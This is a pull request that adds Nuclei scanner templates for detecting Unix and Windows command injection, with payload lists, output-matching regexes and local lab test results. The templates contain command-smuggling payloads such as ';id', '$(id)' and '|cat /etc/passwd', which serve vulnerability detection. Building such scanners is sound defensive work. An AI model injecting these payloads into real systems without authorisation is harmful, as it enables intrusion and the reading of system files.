### PR TITLE
Add Unix and Windows Command Injection Detection Template

### DIFF
--- a/dast/vulnerabilities/injection/unix-command-injection.yaml
+++ b/dast/vulnerabilities/injection/unix-command-injection.yaml
@@ -1,0 +1,75 @@
+id: unix-command-injection
+
+info:
+  name: Unix Command Injection - Detection
+  author: pdteam
+  severity: high
+  description: |
+    Detects command injection vulnerabilities in Unix/Linux systems using various payload techniques.
+    Command injection allows execution of arbitrary commands on the host operating system via a vulnerable application.
+  reference:
+    - https://owasp.org/www-community/attacks/Command_Injection
+  tags: dast,injection,rce,command-injection,unix,linux
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      unix_fuzz:
+        - ';id'
+        - '|id'
+        - '&id'
+        - '&&id'
+        - '`id`'
+        - '$(id)'
+        - ';whoami'
+        - '|whoami'
+        - '&&whoami'
+        - ';cat /etc/passwd'
+        - '|cat /etc/passwd'
+        - '&&cat /etc/passwd'
+        - ';ls -la'
+        - '|ls -la'
+        - '%0Aid'
+        - '%0Awhoami'
+        - '%0Acat%20/etc/passwd'
+        - ';sleep 5'
+        - '|sleep 5'
+        - '&&sleep 5'
+        - '`sleep 5`'
+
+    fuzzing:
+      - part: query
+        type: replace # replaces existing parameter value with fuzz payload
+        mode: multiple # replaces all parameters value with fuzz payload
+        fuzz:
+          - '{{unix_fuzz}}'
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        name: unix-id-output
+        part: body
+        regex:
+          - 'uid=\d+\([^)]+\)'
+
+      - type: regex
+        name: unix-passwd-content
+        part: body
+        regex:
+          - 'root:.*?:[0-9]*:[0-9]*:'
+
+      - type: regex
+        name: unix-ls-output
+        part: body
+        regex:
+          - 'total \d+'
+
+      - type: dsl
+        name: time-based-unix
+        dsl:
+          - 'duration >= 4'

--- a/dast/vulnerabilities/injection/unix-command-injection.yaml
+++ b/dast/vulnerabilities/injection/unix-command-injection.yaml
@@ -73,7 +73,8 @@ http:
 
       - type: regex
         name: unix-ls-output
-        part: body        regex:
+        part: body        
+        regex:
           - '(?m)^\\s*total\\s+\\d+\\s*$'
 
       - type: dsl

--- a/dast/vulnerabilities/injection/unix-command-injection.yaml
+++ b/dast/vulnerabilities/injection/unix-command-injection.yaml
@@ -1,21 +1,29 @@
 id: unix-command-injection
 
 info:
-  name: Unix Command Injection - Detection
-  author: pdteam
+  name: Unix Command Injection - Generic Fuzz Detection
+  author: Jaenact
   severity: high
   description: |
-    Detects command injection vulnerabilities in Unix/Linux systems using various payload techniques.
-    Command injection allows execution of arbitrary commands on the host operating system via a vulnerable application.
+    Replaces query parameter values with command-separator payloads (e.g., ;, |, &&, backticks, $(..))
+    and detects possible OS command execution on Unix/Linux targets by matching id/whoami output,
+    /etc/passwd indicators, directory listings, or time-based delays.
+    Note: requires running nuclei with -fuzz and a target URL that includes at least one query parameter.
   reference:
     - https://owasp.org/www-community/attacks/Command_Injection
-  tags: dast,injection,rce,command-injection,unix,linux
+    - https://cwe.mitre.org/data/definitions/78.html
+    - https://capec.mitre.org/data/definitions/88.html
+  classification:
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+  tags: dast,injection,rce,command-injection,unix,linux,intrusive
 
 http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
+  - method: GET
+    path:
+      - "{{BaseURL}}"
 
     payloads:
       unix_fuzz:
@@ -43,8 +51,8 @@ http:
 
     fuzzing:
       - part: query
-        type: replace # replaces existing parameter value with fuzz payload
-        mode: multiple # replaces all parameters value with fuzz payload
+        type: replace
+        mode: multiple
         fuzz:
           - '{{unix_fuzz}}'
 
@@ -55,19 +63,18 @@ http:
         name: unix-id-output
         part: body
         regex:
-          - 'uid=\d+\([^)]+\)'
+          - '(?m)\\buid=\\d+\\([^)]+\\)\\b'
 
       - type: regex
         name: unix-passwd-content
         part: body
         regex:
-          - 'root:.*?:[0-9]*:[0-9]*:'
+          - '(?m)^root:.*?:[0-9]+:[0-9]+:'
 
       - type: regex
         name: unix-ls-output
-        part: body
-        regex:
-          - 'total \d+'
+        part: body        regex:
+          - '(?m)^\\s*total\\s+\\d+\\s*$'
 
       - type: dsl
         name: time-based-unix

--- a/dast/vulnerabilities/injection/unix-command-injection.yaml
+++ b/dast/vulnerabilities/injection/unix-command-injection.yaml
@@ -1,83 +1,80 @@
 id: unix-command-injection
 
 info:
-  name: Unix Command Injection - Generic Fuzz Detection
+  name: Unix Command Injection - Generic Detection
   author: Jaenact
   severity: high
   description: |
-    Replaces query parameter values with command-separator payloads (e.g., ;, |, &&, backticks, $(..))
-    and detects possible OS command execution on Unix/Linux targets by matching id/whoami output,
-    /etc/passwd indicators, directory listings, or time-based delays.
-    Note: requires running nuclei with -fuzz and a target URL that includes at least one query parameter.
+    Detected potential Unix/Linux OS command injection by replacing query parameter values with shell separator payloads and identifying successful command execution through command output patterns or response time delays. Payloads included semicolons, pipes, logical AND operators, backticks, command substitution, and newline injection.
+  impact: |
+    Successful exploitation allows arbitrary command execution on the underlying operating system, leading to full server compromise, data exfiltration, lateral movement, and denial of service.
+  remediation: |
+    Never pass user-controlled input directly to shell commands. Use parameterized APIs or language-native functions instead of system()/exec(). Apply strict allowlist input validation and enforce least-privilege execution contexts for application processes.
   reference:
     - https://owasp.org/www-community/attacks/Command_Injection
     - https://cwe.mitre.org/data/definitions/78.html
     - https://capec.mitre.org/data/definitions/88.html
+    - https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cwe-id: CWE-78
   metadata:
     verified: true
-    max-request: 1
-  tags: dast,injection,rce,command-injection,unix,linux,intrusive
+    max-request: 15
+  tags: cmdi,dast,rce,unix,linux,fuzz,vuln
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
 
     payloads:
-      unix_fuzz:
-        - ';id'
-        - '|id'
-        - '&id'
-        - '&&id'
-        - '`id`'
-        - '$(id)'
-        - ';whoami'
-        - '|whoami'
-        - '&&whoami'
-        - ';cat /etc/passwd'
-        - '|cat /etc/passwd'
-        - '&&cat /etc/passwd'
-        - ';ls -la'
-        - '|ls -la'
-        - '%0Aid'
-        - '%0Awhoami'
-        - '%0Acat%20/etc/passwd'
-        - ';sleep 5'
-        - '|sleep 5'
-        - '&&sleep 5'
-        - '`sleep 5`'
+      injection:
+        # shell separators with id
+        - ";id"
+        - "|id"
+        - "&&id"
+        - "`id`"
+        - "$(id)"
+        # file read
+        - ";cat /etc/passwd"
+        - "|cat /etc/passwd"
+        - "$(cat /etc/passwd)"
+        # newline injection
+        - "%0aid"
+        - "%0acat+/etc/passwd"
+        # time-based
+        - ";sleep 5"
+        - "|sleep 5"
+        - "&&sleep 5"
+        - "$(sleep 5)"
+        - "`sleep 5`"
 
     fuzzing:
       - part: query
         type: replace
-        mode: multiple
+        mode: single
         fuzz:
-          - '{{unix_fuzz}}'
+          - "{{injection}}"
 
     stop-at-first-match: true
     matchers-condition: or
     matchers:
       - type: regex
-        name: unix-id-output
+        name: id-output
         part: body
         regex:
-          - '(?m)\\buid=\\d+\\([^)]+\\)\\b'
+          - 'uid=\d+\([^)]+\)\s+gid=\d+'
 
       - type: regex
-        name: unix-passwd-content
+        name: etc-passwd
         part: body
         regex:
-          - '(?m)^root:.*?:[0-9]+:[0-9]+:'
-
-      - type: regex
-        name: unix-ls-output
-        part: body        
-        regex:
-          - '(?m)^\\s*total\\s+\\d+\\s*$'
+          - 'root:.*:0:0:'
 
       - type: dsl
-        name: time-based-unix
+        name: time-based
         dsl:
           - 'duration >= 4'

--- a/dast/vulnerabilities/injection/windows-command-injection.yaml
+++ b/dast/vulnerabilities/injection/windows-command-injection.yaml
@@ -1,21 +1,29 @@
 id: windows-command-injection
 
 info:
-  name: Windows Command Injection - Detection
-  author: pdteam
+  name: Windows Command Injection - Generic Fuzz Detection
+  author: Jaenact
   severity: high
   description: |
-    Detects command injection vulnerabilities in Windows systems using various payload techniques.
-    Command injection allows execution of arbitrary commands on the host operating system via a vulnerable application.
+    Replaces query parameter values with command-separator payloads (e.g., ;, |, &, &&)
+    and detects possible OS command execution on Windows targets by matching dir/systeminfo/whoami hints
+    or time-based delays via ping.
+    Note: requires running nuclei with -fuzz and a target URL that includes at least one query parameter.
   reference:
     - https://owasp.org/www-community/attacks/Command_Injection
-  tags: dast,injection,rce,command-injection,windows
+    - https://cwe.mitre.org/data/definitions/78.html
+    - https://capec.mitre.org/data/definitions/88.html
+  classification:
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+  tags: dast,injection,rce,command-injection,windows,intrusive
 
 http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
+  - method: GET
+    path:
+      - "{{BaseURL}}"
 
     payloads:
       windows_fuzz:
@@ -23,6 +31,7 @@ http:
         - '|dir'
         - '&dir'
         - '&&dir'
+        - '||dir'
         - ';whoami'
         - '|whoami'
         - '&&whoami'
@@ -32,16 +41,16 @@ http:
         - ';ipconfig'
         - '|ipconfig'
         - '&&ipconfig'
-        - ';dir C:\'
-        - '|dir C:\'
-        - '&&dir C:\'
+        - ';dir C:\\'
+        - '|dir C:\\'
+        - '&&dir C:\\'
         - '&ping -n 5 127.0.0.1&'
         - '&&ping -n 5 127.0.0.1&&'
 
     fuzzing:
       - part: query
-        type: replace # replaces existing parameter value with fuzz payload
-        mode: multiple # replaces all parameters value with fuzz payload
+        type: replace
+        mode: multiple
         fuzz:
           - '{{windows_fuzz}}'
 
@@ -51,17 +60,19 @@ http:
       - type: regex
         name: windows-dir-output
         part: body
+        # Typical dir output lines
         regex:
-          - 'Volume in drive [A-Z]'
-          - 'Directory of [A-Z]:\\'
+          - '(?m)^\\s*Directory of [A-Z]:\\\\'
+          - '(?m)^\\s*Volume in drive [A-Z]'
 
-      - type: word
+      - type: regex
         name: windows-systeminfo
         part: body
-        words:
-          - 'Host Name:'
-          - 'OS Name:'
-          - 'Windows IP Configuration'
+        # Robust against minor locale/case differences
+        regex:
+          - '(?mi)^OS Name:\\s'
+          - '(?mi)^Host Name:\\s'
+          - '(?mi)^Windows IP Configuration'
 
       - type: dsl
         name: time-based-windows

--- a/dast/vulnerabilities/injection/windows-command-injection.yaml
+++ b/dast/vulnerabilities/injection/windows-command-injection.yaml
@@ -1,0 +1,69 @@
+id: windows-command-injection
+
+info:
+  name: Windows Command Injection - Detection
+  author: pdteam
+  severity: high
+  description: |
+    Detects command injection vulnerabilities in Windows systems using various payload techniques.
+    Command injection allows execution of arbitrary commands on the host operating system via a vulnerable application.
+  reference:
+    - https://owasp.org/www-community/attacks/Command_Injection
+  tags: dast,injection,rce,command-injection,windows
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      windows_fuzz:
+        - ';dir'
+        - '|dir'
+        - '&dir'
+        - '&&dir'
+        - ';whoami'
+        - '|whoami'
+        - '&&whoami'
+        - ';systeminfo'
+        - '|systeminfo'
+        - '&&systeminfo'
+        - ';ipconfig'
+        - '|ipconfig'
+        - '&&ipconfig'
+        - ';dir C:\'
+        - '|dir C:\'
+        - '&&dir C:\'
+        - '&ping -n 5 127.0.0.1&'
+        - '&&ping -n 5 127.0.0.1&&'
+
+    fuzzing:
+      - part: query
+        type: replace # replaces existing parameter value with fuzz payload
+        mode: multiple # replaces all parameters value with fuzz payload
+        fuzz:
+          - '{{windows_fuzz}}'
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        name: windows-dir-output
+        part: body
+        regex:
+          - 'Volume in drive [A-Z]'
+          - 'Directory of [A-Z]:\\'
+
+      - type: word
+        name: windows-systeminfo
+        part: body
+        words:
+          - 'Host Name:'
+          - 'OS Name:'
+          - 'Windows IP Configuration'
+
+      - type: dsl
+        name: time-based-windows
+        dsl:
+          - 'duration >= 4'

--- a/dast/vulnerabilities/injection/windows-command-injection.yaml
+++ b/dast/vulnerabilities/injection/windows-command-injection.yaml
@@ -1,80 +1,93 @@
 id: windows-command-injection
 
 info:
-  name: Windows Command Injection - Generic Fuzz Detection
+  name: Windows Command Injection - Generic Detection
   author: Jaenact
   severity: high
   description: |
-    Replaces query parameter values with command-separator payloads (e.g., ;, |, &, &&)
-    and detects possible OS command execution on Windows targets by matching dir/systeminfo/whoami hints
-    or time-based delays via ping.
-    Note: requires running nuclei with -fuzz and a target URL that includes at least one query parameter.
+    Detected potential OS command injection on Windows targets by replacing query parameter values with command separator payloads and identifying successful command execution through output patterns from `dir`, `whoami`, `systeminfo`, or response time delays induced via `ping`.
+  impact: |
+    Successful exploitation allows arbitrary command execution on the underlying Windows system, leading to full server compromise, data exfiltration, privilege escalation, and denial of service.
+  remediation: |
+    Never pass user-controlled input directly to cmd.exe or PowerShell. Use parameterized APIs or language-native functions instead of system()/exec(). Apply strict allowlist input validation and enforce least-privilege execution contexts for application processes.
   reference:
     - https://owasp.org/www-community/attacks/Command_Injection
     - https://cwe.mitre.org/data/definitions/78.html
     - https://capec.mitre.org/data/definitions/88.html
+    - https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cwe-id: CWE-78
   metadata:
     verified: true
-    max-request: 1
-  tags: dast,injection,rce,command-injection,windows,intrusive
+    max-request: 14
+  tags: cmdi,dast,rce,windows,fuzz,vuln
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
 
     payloads:
-      windows_fuzz:
-        - ';dir'
-        - '|dir'
-        - '&dir'
-        - '&&dir'
-        - '||dir'
-        - ';whoami'
-        - '|whoami'
-        - '&&whoami'
-        - ';systeminfo'
-        - '|systeminfo'
-        - '&&systeminfo'
-        - ';ipconfig'
-        - '|ipconfig'
-        - '&&ipconfig'
-        - ';dir C:\\'
-        - '|dir C:\\'
-        - '&&dir C:\\'
-        - '&ping -n 5 127.0.0.1&'
-        - '&&ping -n 5 127.0.0.1&&'
+      injection:
+        # dir output
+        - "|dir"
+        - "&dir"
+        - "&&dir"
+        - "||dir"
+        - "|dir C:\\"
+        - "&&dir C:\\"
+        # identity
+        - "|whoami"
+        - "&&whoami"
+        # system enumeration
+        - "|systeminfo"
+        - "&&systeminfo"
+        - "|ipconfig"
+        - "&&ipconfig"
+        # time-based
+        - "&ping -n 5 127.0.0.1&"
+        - "&&ping -n 5 127.0.0.1&&"
 
     fuzzing:
       - part: query
         type: replace
-        mode: multiple
+        mode: single
         fuzz:
-          - '{{windows_fuzz}}'
+          - "{{injection}}"
 
     stop-at-first-match: true
     matchers-condition: or
     matchers:
       - type: regex
-        name: windows-dir-output
+        name: dir-output
         part: body
-        # Typical dir output lines
         regex:
-          - '(?m)^\\s*Directory of [A-Z]:\\\\'
-          - '(?m)^\\s*Volume in drive [A-Z]'
+          - '(?mi)Directory of [A-Z]:\\\\'
+          - '(?mi)Volume in drive [A-Z]'
 
       - type: regex
-        name: windows-systeminfo
+        name: systeminfo-output
         part: body
-        # Robust against minor locale/case differences
         regex:
-          - '(?mi)^OS Name:\\s'
-          - '(?mi)^Host Name:\\s'
-          - '(?mi)^Windows IP Configuration'
+          - '(?mi)^OS Name:\s+'
+          - '(?mi)^Host Name:\s+'
+
+      - type: regex
+        name: ipconfig-output
+        part: body
+        regex:
+          - '(?mi)Windows IP Configuration'
+
+      - type: regex
+        name: whoami-output
+        part: body
+        regex:
+          - '(?mi)^[a-z][-a-z0-9]*\\\\[a-z][-a-z0-9]*$'
 
       - type: dsl
-        name: time-based-windows
+        name: time-based
         dsl:
           - 'duration >= 4'


### PR DESCRIPTION
### Template / PR Information

**Added:**

- `windows-command-injection.yaml`
- `unix-command-injection.yaml`

These templates detect command injection vulnerabilities in Windows and Unix/Linux systems by injecting common OS commands via query parameters and observing the output or timing behavior.

Both templates are designed for safe detection using non-destructive payloads and support both output-based and time-based matchers. They target applications that reflect user input into system shell execution contexts.

---

### 🧩 Detection Logic Summary

#### 🪟 windows-command-injection.yaml

- Payloads:
  - `;whoami`, `|systeminfo`, `&&dir`, `&ping -n 5 127.0.0.1`
- Matchers:
  - `OS Name:`, `Windows Directory:` (systeminfo output)
  - `Volume in drive`, `Directory of C:\\` (dir output)
  - `duration >= 4` for time-based detection

#### 🐧 unix-command-injection.yaml

- Payloads:
  - `;id`, `|whoami`, `&&cat /etc/passwd`, `$(id)`, `` `sleep 5` ``
- Matchers:
  - `uid=xxx(username)` (id output)
  - `root:x:0:0:` (/etc/passwd output)
  - `total \\d+` (`ls -la` output)
  - `duration >= 4` for time-based detection

---

### ✅ Template Validation

I've validated these templates locally?
- [x] YES
- [ ] NO

---

### 🧪 Test Environment
#### Windows Server:
- Local Flask app running on Windows
- Endpoint: `http://127.0.0.1:5002/?cmd=...`
- Internally runs: `cmd.exe /c {{cmd}}`

#### Unix Server:
- Local Flask app running on Ubuntu 22.04
- Endpoint: `http://127.0.0.1:5001/?cmd=...`
- Internally runs: `os.popen({{cmd}})`

Both servers return output within `<pre>...</pre>` blocks and accept direct command input via `cmd=` query string.

---

### 🧾 Sample Detection Output (Sanitized)

- Some payloads didn’t match due to Korean server responses. Please consider locale differences during testing.

#### Windows:
[windows-command-injection:time-based-windows] [http] [high] http://127.0.0.1:5002/?cmd=;systeminfo [GET]
Scan completed in 5.48s. 1 matches found.

<pre>
OS name: Microsoft Windows 11 Home
OS version: 10.0.26100 ...
</pre>

#### Test Image
<img width="1594" height="708" alt="image" src="https://github.com/user-attachments/assets/2135a41b-80b3-4b39-9305-2a475e747819" />
<img width="1320" height="770" alt="image" src="https://github.com/user-attachments/assets/680bac70-e84e-4355-96a1-b1d3d15c5c05" />
<pre>
The volume in drive C has no label.
Volume Serial Number: [REDACTED]

Directory of C:\Users\[REDACTED]\Downloads\flask-injection-lab

2025-08-06  11:48 AM    <DIR>    .
2025-08-06  11:48 AM    <DIR>    ..
2025-08-06  11:48 AM    <DIR>    unix
2025-08-06  11:48 AM    <DIR>    windows
               0 File(s)              0 bytes
               4 Dir(s)     174,209,110,016 bytes free
</pre>
<img width="1412" height="756" alt="image" src="https://github.com/user-attachments/assets/905f2af4-63a7-4832-8073-ae05c6c3db55" />
<pre>
Host Name: BOOK
OS Name: Microsoft Windows 11 Home  
OS Manufacturer: Microsoft Corporation  
OS Configuration: Standalone Workstation  
OS Build Type: Multiprocessor Free  
...
</pre>

<img width="1597" height="164" alt="image" src="https://github.com/user-attachments/assets/efb6f815-7abe-46b5-bbb6-3ba9c7507185" />

#### Unix:
[unix-command-injection:unix-id-output] [http] [high] http://127.0.0.1:5001/?cmd=;id [GET]

<pre>
uid=1000(schemauser) gid=1000(schemauser) groups=1000(schemauser)
</pre>

#### Test Image
<img width="1568" height="810" alt="image" src="https://github.com/user-attachments/assets/41e23ad4-c214-416f-a62e-c03269467dcc" />
<img width="1823" height="872" alt="image" src="https://github.com/user-attachments/assets/b885a70f-5ebb-401e-9db5-cf33a5f5f1d2" />
<img width="1680" height="641" alt="image" src="https://github.com/user-attachments/assets/45eaa516-0100-4e06-add2-6f87c1966c12" />


---

### ✍️ Notes

- Matchers are tuned to avoid false positives while maintaining safe and non-destructive detection
- Time-based matchers ensure coverage when output is blocked or filtered
- Encoded payloads (`%0A`, `` `sleep 5` ``) included for additional bypasses

---

### 📎 References

- https://owasp.org/www-community/attacks/Command_Injection
- https://github.com/payloadbox/command-injection-payload-list

---

### 🏷 Tags

- `windows-command-injection.yaml`: `dast,rce,injection,command-injection,windows`
- `unix-command-injection.yaml`: `dast,rce,injection,command-injection,unix,linux`
"""